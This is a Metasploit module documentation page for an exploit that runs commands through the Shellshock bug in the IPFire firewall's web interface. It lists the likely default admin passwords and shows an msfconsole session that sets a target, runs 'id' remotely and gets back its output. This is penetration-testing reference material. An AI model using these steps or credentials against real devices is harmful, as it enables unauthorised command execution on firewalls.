metasploit-gs/documentation/modules/exploit/linux/http/ipfire_bashbug_exec.md at df55f9a57c409d737ad0439e9cf3fc32cd9a328e

adam/metasploit-gs

Fork 0

Files

T

h00die df55f9a57c first add of ipfire shellshock

2016-05-29 20:40:12 -04:00

1.3 KiB

Raw Blame History

The following is the recommended format for module documentation. But feel free to add more content/sections to this.

Vulnerable Application

Official Source: ipfire Archived Copy: github

Verification Steps

Example steps in this format:

Install the firewall
Start msfconsole
Do: use exploit/linux/http/ipfire_bashbug_exec
Do: set rhost 10.10.10.10
Do: set CMD ls
Do: run
You should see the output of the command that was run.

Options

PASSWORD

Password is set at install. May be blank, 'admin', or 'ipfire'.

CMD

This is the command to run on the system.

Scenarios

Example of running the ID command

  msf > use exploit/linux/http/ipfire_bashbug_exec 
  msf exploit(ipfire_bashbug_exec) > set PASSWORD admin
  PASSWORD => admin
  msf exploit(ipfire_bashbug_exec) > set rhost 192.168.2.202
  rhost => 192.168.2.202
  msf exploit(ipfire_bashbug_exec) > set CMD id
  CMD => id
  msf exploit(ipfire_bashbug_exec) > exploit
  
  [+] uid=99(nobody) gid=99(nobody) groups=16(dialout),23(squid),99(nobody)
  [*] Exploit completed, but no session was created.

1.3 KiB Raw Blame History

Vulnerable Application

Verification Steps

Options

Scenarios

1.3 KiB

Raw Blame History